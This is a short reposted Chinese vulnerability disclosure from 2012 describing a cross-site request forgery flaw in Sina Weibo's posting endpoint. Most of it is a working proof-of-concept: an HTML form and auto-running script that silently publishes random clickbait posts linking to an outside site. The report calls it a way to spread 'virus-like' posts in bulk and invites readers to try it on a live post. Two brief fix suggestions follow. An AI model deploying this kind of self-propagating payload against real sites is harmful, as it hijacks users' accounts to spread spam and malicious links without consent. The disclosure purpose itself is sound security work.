新浪微博可导致大面积病毒传播漏洞

2012-4-19 14:51:57 来源:网络转载 浏览:109
新浪微博最新漏洞公开:新浪微博可导致大面积病毒传播漏洞。
漏洞详情
简要描述:顺便结合之前发的自动加关注漏洞,完美结合!
详细说明:微数据 发微博缺少来源验证
漏洞证明:看看这个微博 http://weibo.com/1829851507/y8ohe17Ct 可试下威力,记得试过了赶快删除微博,以免传播开...
<form action="http://data.weibo.com/mydata/ajax/post" method="post" id="f2" target="ifr2">
<input name="text" id="updatemsg" value="">
<input name="picid" value="6d115173jw1dqo6buv5r0j">
<input name="pic" value="http://ww1.sinaimg.cn/large/6d115173jw1dqo6buv5r0j.jpg">
<input  type="submit">
</form>
<iframe id="ifr2" name="ifr2"></iframe>
<script>
function rand_msg(){
 var url = '   http://weibonews.sinaapp.com/data.php?id=' + new Date().getTime();
 var msgs = [
  '晒一个90后男生的惊人结婚帐:',
  '怀二胎PP想尽办法逼我生儿子:',
  '明星成名前的卑微职业曝光:',
  '户籍制度改革终于艰难起步:',
  '白静被杀,盘点因情变酿成悲剧的明星们(图):',
  '终于曝光:朝鲜战争中被埋没了50年的惊人真相:',
  '主席一句话:周总理惊呆了,尼克松心服了 :'];
 var msg = msgs[Math.floor(Math.random()*msgs.length)] + url;
 return msg;
}
function update(msg){
 document.getElementById('updatemsg').value=encodeURIComponent(rand_msg())
 document.getElementById('f2').submit();
}
update(rand_msg());
</script>
修复方案:
1.加来源限制
2.加是否是ajax判断
(0)
(0)